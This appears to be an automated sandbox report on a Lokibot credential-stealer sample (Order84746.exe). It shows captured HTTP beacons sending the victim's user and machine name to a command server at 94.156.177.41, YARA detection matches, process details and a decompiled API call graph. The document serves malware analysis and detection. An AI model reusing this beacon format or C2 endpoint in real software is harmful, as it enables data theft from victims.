                        Nov 29, 2024 07:38:12.960716963 CET246OUTPOST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:38:13.081566095 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:38:14.378434896 CET193INHTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:38:14 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        33192.168.2.44980694.156.177.41803300C:\Windows\SysWOW64\svchost.exe
                        TimestampBytes transferredDirectionData
                        Nov 29, 2024 07:38:14.644509077 CET246OUTPOST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:38:14.764600992 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:01:36:56
                        Start date:29/11/2024
                        Path:C:\Users\user\Desktop\Order84746.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\Order84746.exe"
                        Imagebase:0x8e0000
                        File size:532'480 bytes
                        MD5 hash:6E891F3ADBFD415FAE70FF8376014769
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: Loki_1, Description: Loki Payload, Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:1
                        Start time:01:36:56
                        Start date:29/11/2024
                        Path:C:\Windows\SysWOW64\svchost.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\Order84746.exe"
                        Imagebase:0xfa0000
                        File size:46'504 bytes
                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000002.2659257287.0000000003621000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                        • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: kevoreilly
                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                        Reputation:high
                        Has exited:true

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:3.9%
                          Dynamic/Decrypted Code Coverage:0.5%
                          Signature Coverage:6.3%
                          Total number of Nodes:1999
                          Total number of Limit Nodes:164
                          execution_graph 93743 8f221a 93744 8f2223 93743->93744 93745 8f271e 93743->93745 93744->93745 93754 8e936c 93744->93754 93753 8f1eba Mailbox 93745->93753 93783 91a58f 48 API calls ___crtGetEnvironmentStringsW 93745->93783 93747 8f224e 93747->93745 93748 8f225e 93747->93748 93774 8eb384 93748->93774 93751 95be8a 93784 8e6eed 93751->93784 93755 8e9384 93754->93755 93772 8e9380 93754->93772 93756 954cbd __i64tow 93755->93756 93757 8e9398 93755->93757 93758 954bbf 93755->93758 93766 8e93b0 __itow Mailbox _wcscpy 93755->93766 93788 90172b 80 API calls 3 library calls 93757->93788 93759 954ca5 93758->93759 93760 954bc8 93758->93760 93804 90172b 80 API calls 3 library calls 93759->93804 93765 954be7 93760->93765 93760->93766 93764 8e93ba 93764->93772 93798 8ece19 93764->93798 93767 8ff4ea 48 API calls 93765->93767 93789 8ff4ea 93766->93789 93770 954c04 93767->93770 93769 8ff4ea 48 API calls 93771 954c2a 93769->93771 93770->93769 93771->93772 93773 8ece19 48 API calls 93771->93773 93772->93747 93773->93772 93775 8eb392 93774->93775 93780 8eb3c5 ___crtGetEnvironmentStringsW 93774->93780 93776 8eb3fd 93775->93776 93777 8eb3b8 93775->93777 93775->93780 93778 8ff4ea 48 API calls 93776->93778 93838 8ebb85 93777->93838 93781 8eb407 93778->93781 93780->93753 93782 8ff4ea 48 API calls 93781->93782 93782->93780 93783->93751 93785 8e6ef8 93784->93785 93786 8e6f00 93784->93786 93843 8edd47 48 API calls ___crtGetEnvironmentStringsW 93785->93843 93786->93753 93788->93766 93792 8ff4f2 __calloc_impl 93789->93792 93791 8ff50c 93791->93764 93792->93791 93793 8ff50e std::exception::exception 93792->93793 93805 90395c 93792->93805 93819 906805 RaiseException 93793->93819 93795 8ff538 93820 90673b 47 API calls _free 93795->93820 93797 8ff54a 93797->93764 93799 8ece28 __NMSG_WRITE 93798->93799 93827 8fee75 93799->93827 93801 8ece50 ___crtGetEnvironmentStringsW 93802 8ff4ea 48 API calls 93801->93802 93803 8ece66 93802->93803 93803->93772 93804->93766 93806 9039d7 __calloc_impl 93805->93806 93809 903968 __calloc_impl 93805->93809 93826 907c0e 47 API calls __getptd_noexit 93806->93826 93810 90399b RtlAllocateHeap 93809->93810 93812 903973 93809->93812 93814 9039c3 93809->93814 93817 9039c1 93809->93817 93810->93809 93811 9039cf 93810->93811 93811->93792 93812->93809 93821 9081c2 47 API calls 2 library calls 93812->93821 93822 90821f 47 API calls 6 library calls 93812->93822 93823 901145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93812->93823 93824 907c0e 47 API calls __getptd_noexit 93814->93824 93825 907c0e 47 API calls __getptd_noexit 93817->93825 93819->93795 93820->93797 93821->93812 93822->93812 93824->93817 93825->93811 93826->93811 93829 8ff4ea __calloc_impl 93827->93829 93828 90395c __malloc_crt 47 API calls 93828->93829 93829->93828 93830 8ff50c 93829->93830 93831 8ff50e std::exception::exception 93829->93831 93830->93801 93836 906805 RaiseException 93831->93836 93833 8ff538 93837 90673b 47 API calls _free 93833->93837 93835 8ff54a 93835->93801 93836->93833 93837->93835 93839 8ebb9b 93838->93839 93841 8ebb96 ___crtGetEnvironmentStringsW 93838->93841 93840 8fee75 48 API calls 93839->93840 93842 951b77 93839->93842 93840->93841 93841->93780 93842->93842 93843->93786 93844 11dafe8 93858 11d8c38 93844->93858 93846 11db0aa 93862 11daed8 93846->93862 93859 11d8c5a 93858->93859 93865 11dc0d8 GetPEB 93859->93865 93861 11d92c3 93861->93846 93863 11daee1 Sleep 93862->93863 93864 11daeef 93863->93864 93866 11dc102 93865->93866 93866->93861 93867 9519dd 93872 8e4a30 93867->93872 93869 9519f1 93892 900f0a 52 API calls __cinit 93869->93892 93871 9519fb 93873 8e4a40 __ftell_nolock 93872->93873 93893 8ed7f7 93873->93893 93877 8e4aff 93905 8e363c 93877->93905 93884 8ed7f7 48 API calls 93885 8e4b32 93884->93885 93927 8e49fb 93885->93927 93887 8e4b43 Mailbox 93887->93869 93888 8e4b3d _wcscat Mailbox __NMSG_WRITE 93888->93887 93889 8ece19 48 API calls 93888->93889 93890 8e64cf 48 API calls 93888->93890 93891 8e61a6 48 API calls 93888->93891 93889->93888 93890->93888 93891->93888 93892->93871 93894 8ff4ea 48 API calls 93893->93894 93895 8ed818 93894->93895 93896 8ff4ea 48 API calls 93895->93896 93897 8e4af6 93896->93897 93898 8e5374 93897->93898 93941 90f8a0 93898->93941 93901 8ece19 48 API calls 93902 8e53a7 93901->93902 93943 8e660f 93902->93943 93904 8e53b1 Mailbox 93904->93877 93906 8e3649 __ftell_nolock 93905->93906 93979 8e366c GetFullPathNameW 93906->93979 93908 8e365a 93909 8e6a63 48 API calls 93908->93909 93910 8e3669 93909->93910 93911 8e518c 93910->93911 93912 8e5197 93911->93912 93913 8e519f 93912->93913 93914 951ace 93912->93914 93981 8e5130 93913->93981 93916 8e6b4a 48 API calls 93914->93916 93918 951adb __NMSG_WRITE 93916->93918 93917 8e4b18 93921 8e64cf 93917->93921 93919 8fee75 48 API calls 93918->93919 93920 951b07 ___crtGetEnvironmentStringsW 93919->93920 93922 8e651b 93921->93922 93926 8e64dd ___crtGetEnvironmentStringsW 93921->93926 93924 8ff4ea 48 API calls 93922->93924 93923 8ff4ea 48 API calls 93925 8e4b29 93923->93925 93924->93926 93925->93884 93926->93923 93991 8ebcce 93927->93991 93930 8e4a2b 93930->93888 93931 9541cc RegQueryValueExW 93932 9541e5 93931->93932 93933 954246 RegCloseKey 93931->93933 93934 8ff4ea 48 API calls 93932->93934 93935 9541fe 93934->93935 93997 8e47b7 93935->93997 93938 954224 93939 8e6a63 48 API calls 93938->93939 93940 95423b 93939->93940 93940->93933 93942 8e5381 GetModuleFileNameW 93941->93942 93942->93901 93944 90f8a0 __ftell_nolock 93943->93944 93945 8e661c GetFullPathNameW 93944->93945 93950 8e6a63 93945->93950 93947 8e6643 93961 8e6571 93947->93961 93951 8e6adf 93950->93951 93954 8e6a6f __NMSG_WRITE 93950->93954 93969 8eb18b 93951->93969 93953 8e6ab6 ___crtGetEnvironmentStringsW 93953->93947 93955 8e6a8b 93954->93955 93956 8e6ad7 93954->93956 93965 8e6b4a 93955->93965 93968 8ec369 48 API calls 93956->93968 93959 8e6a95 93960 8fee75 48 API calls 93959->93960 93960->93953 93962 8e657f 93961->93962 93963 8eb18b 48 API calls 93962->93963 93964 8e658f 93963->93964 93964->93904 93966 8ff4ea 48 API calls 93965->93966 93967 8e6b54 93966->93967 93967->93959 93968->93953 93970 8eb199 93969->93970 93971 8eb1a2 ___crtGetEnvironmentStringsW 93969->93971 93970->93971 93973 8ebdfa 93970->93973 93971->93953 93974 8ebe0d 93973->93974 93975 8ebe0a ___crtGetEnvironmentStringsW 93973->93975 93976 8ff4ea 48 API calls 93974->93976 93975->93971 93977 8ebe17 93976->93977 93978 8fee75 48 API calls 93977->93978 93978->93975 93980 8e368a 93979->93980 93980->93908 93982 8e513f __NMSG_WRITE 93981->93982 93983 951b27 93982->93983 93984 8e5151 93982->93984 93985 8e6b4a 48 API calls 93983->93985 93986 8ebb85 48 API calls 93984->93986 93987 951b34 93985->93987 93988 8e515e ___crtGetEnvironmentStringsW 93986->93988 93989 8fee75 48 API calls 93987->93989 93988->93917 93990 951b57 ___crtGetEnvironmentStringsW 93989->93990 93992 8e4a0a RegOpenKeyExW 93991->93992 93993 8ebce8 93991->93993 93992->93930 93992->93931 93994 8ff4ea 48 API calls 93993->93994 93995 8ebcf2 93994->93995 93996 8fee75 48 API calls 93995->93996 93996->93992 93998 8ff4ea 48 API calls 93997->93998 93999 8e47c9 RegQueryValueExW 93998->93999 93999->93938 93999->93940 94000 959bec 94004 8f0ae0 Mailbox ___crtGetEnvironmentStringsW 94000->94004 94002 8effe1 Mailbox 94003 8f1526 Mailbox 94098 92cc5c 86 API calls 4 library calls 94003->94098 94004->94002 94004->94003 94025 8ece19 48 API calls 94004->94025 94030 8efec8 94004->94030 94035 8ff4ea 48 API calls 94004->94035 94037 95a706 94004->94037 94039 9197ed InterlockedDecrement 94004->94039 94056 940d09 94004->94056 94059 940d1d 94004->94059 94063 8efe30 94004->94063 94092 93ef61 82 API calls 2 library calls 94004->94092 94093 93f0ac 90 API calls Mailbox 94004->94093 94094 92a6ef 48 API calls 94004->94094 94095 93e822 335 API calls Mailbox 94004->94095 94007 8f146e 94014 8e6eed 48 API calls 94007->94014 94011 8ff4ea 48 API calls 94011->94030 94012 8e6eed 48 API calls 94012->94030 94013 95a922 94014->94002 94016 8f1473 94100 92cc5c 86 API calls 4 library calls 94016->94100 94017 95a246 94021 8e6eed 48 API calls 94017->94021 94018 8f0509 94101 92cc5c 86 API calls 4 library calls 94018->94101 94021->94002 94022 95a873 94023 8ed7f7 48 API calls 94023->94030 94024 95a30e 94024->94002 94096 9197ed InterlockedDecrement 94024->94096 94025->94004 94026 9197ed InterlockedDecrement 94026->94030 94028 95a973 94102 92cc5c 86 API calls 4 library calls 94028->94102 94030->94002 94030->94007 94030->94011 94030->94012 94030->94016 94030->94017 94030->94018 94030->94023 94030->94024 94030->94026 94030->94028 94031 900f0a 52 API calls __cinit 94030->94031 94034 8f15b5 94030->94034 94042 8f1d10 94030->94042 94062 8f1820 335 API calls 2 library calls 94030->94062 94031->94030 94032 95a982 94099 92cc5c 86 API calls 4 library calls 94034->94099 94035->94004 94097 92cc5c 86 API calls 4 library calls 94037->94097 94039->94004 94043 8f1d2a 94042->94043 94047 8f1ed6 94042->94047 94044 8f2357 94043->94044 94043->94047 94048 8f1e0b 94043->94048 94049 8f1eba 94043->94049 94044->94049 94106 929f44 58 API calls __gmtime64_s 94044->94106 94046 8f1f55 94046->94049 94051 8f1e9a Mailbox 94046->94051 94104 9197ed InterlockedDecrement 94046->94104 94047->94044 94047->94046 94047->94049 94047->94051 94048->94046 94048->94049 94050 8f1e47 94048->94050 94049->94030 94050->94049 94050->94051 94053 95bfc4 94050->94053 94051->94049 94105 90203b 58 API calls __wtof_l 94051->94105 94103 90203b 58 API calls __wtof_l 94053->94103 94107 93f8ae 94056->94107 94058 940d19 94058->94004 94060 93f8ae 129 API calls 94059->94060 94061 940d2d 94060->94061 94061->94004 94062->94030 94064 8efe50 94063->94064 94088 8efe7e 94063->94088 94065 8ff4ea 48 API calls 94064->94065 94065->94088 94066 900f0a 52 API calls __cinit 94066->94088 94067 8f146e 94068 8e6eed 48 API calls 94067->94068 94090 8effe1 94068->94090 94069 9197ed InterlockedDecrement 94069->94088 94070 8f1d10 59 API calls 94070->94088 94071 8f0509 94228 92cc5c 86 API calls 4 library calls 94071->94228 94074 8ff4ea 48 API calls 94074->94088 94075 95a922 94075->94004 94076 8f1473 94227 92cc5c 86 API calls 4 library calls 94076->94227 94077 95a246 94081 8e6eed 48 API calls 94077->94081 94079 8e6eed 48 API calls 94079->94088 94081->94090 94082 8ed7f7 48 API calls 94082->94088 94083 95a873 94083->94004 94084 95a30e 94084->94090 94225 9197ed InterlockedDecrement 94084->94225 94086 95a973 94229 92cc5c 86 API calls 4 library calls 94086->94229 94088->94066 94088->94067 94088->94069 94088->94070 94088->94071 94088->94074 94088->94076 94088->94077 94088->94079 94088->94082 94088->94084 94088->94086 94088->94090 94091 8f15b5 94088->94091 94224 8f1820 335 API calls 2 library calls 94088->94224 94089 95a982 94090->94004 94226 92cc5c 86 API calls 4 library calls 94091->94226 94092->94004 94093->94004 94094->94004 94095->94004 94096->94002 94097->94003 94098->94002 94099->94002 94100->94022 94101->94013 94102->94032 94103->94049 94104->94051 94105->94049 94106->94049 94108 8e936c 81 API calls 94107->94108 94109 93f8ea 94108->94109 94114 93f92c Mailbox 94109->94114 94143 940567 94109->94143 94111 93fb8b 94112 93fcfa 94111->94112 94119 93fb95 94111->94119 94206 940688 89 API calls Mailbox 94112->94206 94114->94058 94116 93fd07 94118 93fd13 94116->94118 94116->94119 94117 93f984 Mailbox 94117->94111 94117->94114 94120 8e936c 81 API calls 94117->94120 94174 9429e8 48 API calls ___crtGetEnvironmentStringsW 94117->94174 94175 93fda5 60 API calls 2 library calls 94117->94175 94118->94114 94156 93f70a 94119->94156 94120->94117 94125 93fbc9 94170 8fed18 94125->94170 94128 93fbe3 94176 92cc5c 86 API calls 4 library calls 94128->94176 94129 93fbfd 94177 8fc050 94129->94177 94132 93fbee GetCurrentProcess TerminateProcess 94132->94129 94133 93fc14 94142 93fc3e 94133->94142 94188 8f1b90 94133->94188 94134 93fd65 94134->94114 94139 93fd7e FreeLibrary 94134->94139 94136 93fc2d 94204 94040f 105 API calls _free 94136->94204 94137 8f1b90 48 API calls 94137->94142 94139->94114 94142->94134 94142->94137 94205 8edcae 50 API calls Mailbox 94142->94205 94207 94040f 105 API calls _free 94142->94207 94144 8ebdfa 48 API calls 94143->94144 94145 940582 CharLowerBuffW 94144->94145 94208 921f11 94145->94208 94149 8ed7f7 48 API calls 94150 9405bb 94149->94150 94215 8e69e9 48 API calls ___crtGetEnvironmentStringsW 94150->94215 94152 9405d2 94154 8eb18b 48 API calls 94152->94154 94153 94061a Mailbox 94153->94117 94155 9405de Mailbox 94154->94155 94155->94153 94216 93fda5 60 API calls 2 library calls 94155->94216 94157 93f725 94156->94157 94161 93f77a 94156->94161 94158 8ff4ea 48 API calls 94157->94158 94159 93f747 94158->94159 94160 8ff4ea 48 API calls 94159->94160 94159->94161 94160->94159 94162 940828 94161->94162 94163 940a53 Mailbox 94162->94163 94166 94084b _strcat _wcscpy __NMSG_WRITE 94162->94166 94163->94125 94164 8ecf93 58 API calls 94164->94166 94165 8ed286 48 API calls 94165->94166 94166->94163 94166->94164 94166->94165 94167 90395c 47 API calls __malloc_crt 94166->94167 94168 8e936c 81 API calls 94166->94168 94219 928035 50 API calls __NMSG_WRITE 94166->94219 94167->94166 94168->94166 94171 8fed2d 94170->94171 94172 8fedc5 VirtualProtect 94171->94172 94173 8fed93 94171->94173 94172->94173 94173->94128 94173->94129 94174->94117 94175->94117 94176->94132 94178 8fc069 Mailbox 94177->94178 94179 8fc064 94177->94179 94184 8fc077 94178->94184 94221 8fc15c 48 API calls 94178->94221 94220 8fc1af 48 API calls 94179->94220 94182 8ff4ea 48 API calls 94183 8fc108 94182->94183 94186 8ff4ea 48 API calls 94183->94186 94184->94182 94185 8fc152 94184->94185 94185->94133 94187 8fc113 94186->94187 94187->94133 94189 8f1cf6 94188->94189 94191 8f1ba2 94188->94191 94189->94136 94190 8f1bae 94198 8f1bb9 94190->94198 94223 8fc15c 48 API calls 94190->94223 94191->94190 94193 8ff4ea 48 API calls 94191->94193 94194 9549c4 94193->94194 94195 8ff4ea 48 API calls 94194->94195 94203 9549cf 94195->94203 94196 8f1c5d 94196->94136 94197 8ff4ea 48 API calls 94199 8f1c9f 94197->94199 94198->94196 94198->94197 94200 8f1cb2 94199->94200 94222 8e2925 48 API calls 94199->94222 94200->94136 94202 8ff4ea 48 API calls 94202->94203 94203->94190 94203->94202 94204->94142 94205->94142 94206->94116 94207->94142 94209 921f3b __NMSG_WRITE 94208->94209 94210 921f79 94209->94210 94212 921ffa 94209->94212 94214 921f6f 94209->94214 94210->94149 94210->94155 94212->94210 94218 8fd37a 60 API calls 94212->94218 94214->94210 94217 8fd37a 60 API calls 94214->94217 94215->94152 94216->94153 94217->94214 94218->94212 94219->94166 94220->94178 94221->94184 94222->94200 94223->94198 94224->94088 94225->94090 94226->94090 94227->94083 94228->94075 94229->94089 94230 8e3742 94231 8e374b 94230->94231 94232 8e37c8 94231->94232 94233 8e3769 94231->94233 94274 8e37c6 94231->94274 94235 8e37ce 94232->94235 94236 951e00 94232->94236 94237 8e382c PostQuitMessage 94233->94237 94238 8e3776 94233->94238 94234 8e37ab NtdllDefWindowProc_W 94270 8e37b9 94234->94270 94239 8e37f6 SetTimer RegisterClipboardFormatW 94235->94239 94240 8e37d3 94235->94240 94279 8e2ff6 16 API calls 94236->94279 94237->94270 94242 951e88 94238->94242 94243 8e3781 94238->94243 94247 8e381f CreatePopupMenu 94239->94247 94239->94270 94244 8e37da KillTimer 94240->94244 94245 951da3 94240->94245 94294 924ddd 60 API calls _memset 94242->94294 94248 8e3789 94243->94248 94249 8e3836 94243->94249 94275 8e3847 Shell_NotifyIconW _memset 94244->94275 94251 951ddc MoveWindow 94245->94251 94252 951da8 94245->94252 94246 951e27 94280 8fe312 335 API calls Mailbox 94246->94280 94247->94270 94255 951e6d 94248->94255 94256 8e3794 94248->94256 94277 8feb83 53 API calls _memset 94249->94277 94251->94270 94259 951dac 94252->94259 94260 951dcb SetFocus 94252->94260 94255->94234 94293 91a5f3 48 API calls 94255->94293 94262 951e58 94256->94262 94269 8e379f 94256->94269 94257 951e9a 94257->94234 94257->94270 94264 951db5 94259->94264 94259->94269 94260->94270 94261 8e37ed 94276 8e390f DeleteObject DestroyWindow Mailbox 94261->94276 94292 9255bd 70 API calls _memset 94262->94292 94263 8e3845 94263->94270 94278 8e2ff6 16 API calls 94264->94278 94269->94234 94281 8e3847 Shell_NotifyIconW _memset 94269->94281 94272 951e4c 94282 8e4ffc 94272->94282 94274->94234 94275->94261 94276->94270 94277->94263 94278->94270 94279->94246 94280->94269 94281->94272 94283 8e5027 _memset 94282->94283 94295 8e4c30 94283->94295 94287 8e50ac 94288 8e50ca Shell_NotifyIconW 94287->94288 94289 953d28 Shell_NotifyIconW 94287->94289 94299 8e51af 94288->94299 94291 8e50df 94291->94274 94292->94263 94293->94274 94294->94257 94296 953c33 94295->94296 94297 8e4c44 94295->94297 94296->94297 94298 953c3c DestroyCursor 94296->94298 94297->94287 94321 925819 61 API calls _W_store_winword 94297->94321 94298->94297 94300 8e51cb 94299->94300 94301 8e52a2 Mailbox 94299->94301 94322 8e6b0f 94300->94322 94301->94291 94304 953ca1 LoadStringW 94308 953cbb 94304->94308 94305 8e51e6 94306 8e6a63 48 API calls 94305->94306 94307 8e51fb 94306->94307 94307->94308 94309 8e520c 94307->94309 94310 8e510d 48 API calls 94308->94310 94311 8e5216 94309->94311 94312 8e52a7 94309->94312 94315 953cc5 94310->94315 94327 8e510d 94311->94327 94314 8e6eed 48 API calls 94312->94314 94317 8e5220 _memset _wcscpy 94314->94317 94316 8e518c 48 API calls 94315->94316 94315->94317 94318 953ce7 94316->94318 94319 8e5288 Shell_NotifyIconW 94317->94319 94320 8e518c 48 API calls 94318->94320 94319->94301 94320->94317 94321->94287 94323 8ff4ea 48 API calls 94322->94323 94324 8e6b34 94323->94324 94325 8e6b4a 48 API calls 94324->94325 94326 8e51d9 94325->94326 94326->94304 94326->94305 94328 8e511f 94327->94328 94329 951be7 94327->94329 94330 8eb384 48 API calls 94328->94330 94336 91a58f 48 API calls ___crtGetEnvironmentStringsW 94329->94336 94332 8e512b 94330->94332 94332->94317 94333 951bf1 94334 8e6eed 48 API calls 94333->94334 94335 951bf9 Mailbox 94334->94335 94336->94333 94337 958eb8 94341 92a635 94337->94341 94339 958ec3 94340 92a635 84 API calls 94339->94340 94340->94339 94346 92a66f 94341->94346 94349 92a642 94341->94349 94342 92a671 94353 8fec4e 81 API calls 94342->94353 94343 92a676 94345 8e936c 81 API calls 94343->94345 94347 92a67d 94345->94347 94346->94339 94348 8e510d 48 API calls 94347->94348 94348->94346 94349->94342 94349->94343 94349->94346 94350 92a669 94349->94350 94352 8f4525 61 API calls ___crtGetEnvironmentStringsW 94350->94352 94352->94346 94353->94343 94354 905dfd 94355 905e09 __fcloseall 94354->94355 94391 907eeb GetStartupInfoW 94355->94391 94357 905e0e 94393 909ca7 GetProcessHeap 94357->94393 94359 905e66 94360 905e71 94359->94360 94478 905f4d 47 API calls 3 library calls 94359->94478 94394 907b47 94360->94394 94363 905e77 94365 905e82 __RTC_Initialize 94363->94365 94479 905f4d 47 API calls 3 library calls 94363->94479 94415 90acb3 94365->94415 94367 905e91 94368 905e9d GetCommandLineW 94367->94368 94480 905f4d 47 API calls 3 library calls 94367->94480 94434 912e7d GetEnvironmentStringsW 94368->94434 94372 905e9c 94372->94368 94375 905ec2 94447 912cb4 94375->94447 94378 905ec8 94379 905ed3 94378->94379 94482 90115b 47 API calls 3 library calls 94378->94482 94461 901195 94379->94461 94382 905edb 94383 905ee6 __wwincmdln 94382->94383 94483 90115b 47 API calls 3 library calls 94382->94483 94465 8e3a0f 94383->94465 94386 905efa 94387 905f09 94386->94387 94484 9013f1 47 API calls _doexit 94386->94484 94485 901186 47 API calls _doexit 94387->94485 94390 905f0e __fcloseall 94392 907f01 94391->94392 94392->94357 94393->94359 94486 90123a 30 API calls 2 library calls 94394->94486 94396 907b4c 94487 907e23 InitializeCriticalSectionAndSpinCount 94396->94487 94398 907b51 94399 907b55 94398->94399 94489 907e6d TlsAlloc 94398->94489 94488 907bbd 50 API calls 2 library calls 94399->94488 94402 907b5a 94402->94363 94403 907b67 94403->94399 94404 907b72 94403->94404 94490 906986 94404->94490 94407 907bb4 94498 907bbd 50 API calls 2 library calls 94407->94498 94410 907b93 94410->94407 94412 907b99 94410->94412 94411 907bb9 94411->94363 94497 907a94 47 API calls 4 library calls 94412->94497 94414 907ba1 GetCurrentThreadId 94414->94363 94416 90acbf __fcloseall 94415->94416 94507 907cf4 94416->94507 94418 90acc6 94419 906986 __calloc_crt 47 API calls 94418->94419 94420 90acd7 94419->94420 94421 90ad42 GetStartupInfoW 94420->94421 94422 90ace2 __fcloseall @_EH4_CallFilterFunc@8 94420->94422 94429 90ae80 94421->94429 94431 90ad57 94421->94431 94422->94367 94423 90af44 94514 90af58 RtlLeaveCriticalSection _doexit 94423->94514 94425 90aec9 GetStdHandle 94425->94429 94426 906986 __calloc_crt 47 API calls 94426->94431 94427 90aedb GetFileType 94427->94429 94428 90ada5 94428->94429 94432 90ade5 InitializeCriticalSectionAndSpinCount 94428->94432 94433 90add7 GetFileType 94428->94433 94429->94423 94429->94425 94429->94427 94430 90af08 InitializeCriticalSectionAndSpinCount 94429->94430 94430->94429 94431->94426 94431->94428 94431->94429 94432->94428 94433->94428 94433->94432 94435 905ead 94434->94435 94436 912e8e 94434->94436 94441 912a7b GetModuleFileNameW 94435->94441 94553 9069d0 47 API calls __malloc_crt 94436->94553 94439 912eca FreeEnvironmentStringsW 94439->94435 94440 912eb4 ___crtGetEnvironmentStringsW 94440->94439 94442 912aaf _wparse_cmdline 94441->94442 94443 905eb7 94442->94443 94444 912ae9 94442->94444 94443->94375 94481 90115b 47 API calls 3 library calls 94443->94481 94554 9069d0 47 API calls __malloc_crt 94444->94554 94446 912aef _wparse_cmdline 94446->94443 94448 912ccd __NMSG_WRITE 94447->94448 94452 912cc5 94447->94452 94449 906986 __calloc_crt 47 API calls 94448->94449 94457 912cf6 __NMSG_WRITE 94449->94457 94450 912d4d 94451 901c9d _free 47 API calls 94450->94451 94451->94452 94452->94378 94453 906986 __calloc_crt 47 API calls 94453->94457 94454 912d72 94455 901c9d _free 47 API calls 94454->94455 94455->94452 94457->94450 94457->94452 94457->94453 94457->94454 94458 912d89 94457->94458 94555 912567 47 API calls __ftell_nolock 